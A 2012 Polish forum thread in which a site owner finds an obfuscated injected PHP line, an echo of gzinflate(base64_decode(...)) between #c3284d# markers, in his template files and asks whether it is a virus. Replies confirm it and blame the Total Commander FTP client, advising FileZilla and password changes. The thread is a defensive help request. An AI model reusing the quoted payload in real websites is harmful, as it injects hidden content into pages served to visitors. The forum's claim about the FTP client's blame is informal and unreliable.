maly90 8 Zgłoś post Napisano Lipiec 17, 2012 Cześć, Mam pewne pytanie wchodzę dzisiaj na jeden ze swoich serwisów i tu nagle wielkie oczy... strona nie działa, odrazu uruchamiam ftp i szukam błędu no i znalazłem w niektórych plikach .tpl taki dopisek: #c3284d#echo(gzinflate(base64_decode("VVHBboMwDL1X6j/kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS+nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns/48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B/ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2+/EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS/7parGmkfU+y1b5D/HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18+XyLoNfNISRsBa1fG1UKwN+HIeK+Pqabw=="))); #/c3284d# po usunięciu go, wszystko zaczelo działać prawidło i teraz mam pytanie czy to nie czasem wirus? Udostępnij ten post Link to postu Udostępnij na innych stronach
xorg 693 Zgłoś post Napisano Lipiec 17, 2012 Wirus. Udostępnij ten post Link to postu Udostępnij na innych stronach
maly90 8 Zgłoś post Napisano Lipiec 17, 2012 Tylko jaka przyczyna może być używam total comander, hasła mam dość długie.. i zaobserwowałem ze prawie na wszystkich serwisach mam takie coś (znajomy mnie poinformował) skanowałem komputer antywirusem i nic nie wykazał. Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość Pokuć Zgłoś post Napisano Lipiec 17, 2012 No bo właśnie używasz total Commandera który takie kwiatki lubi robić Zmień na FileZillę, pozmieniaj hasła i porób porządki w kodzie (wywal to ustrojstwo) i będziesz miał spokój Udostępnij ten post Link to postu Udostępnij na innych stronach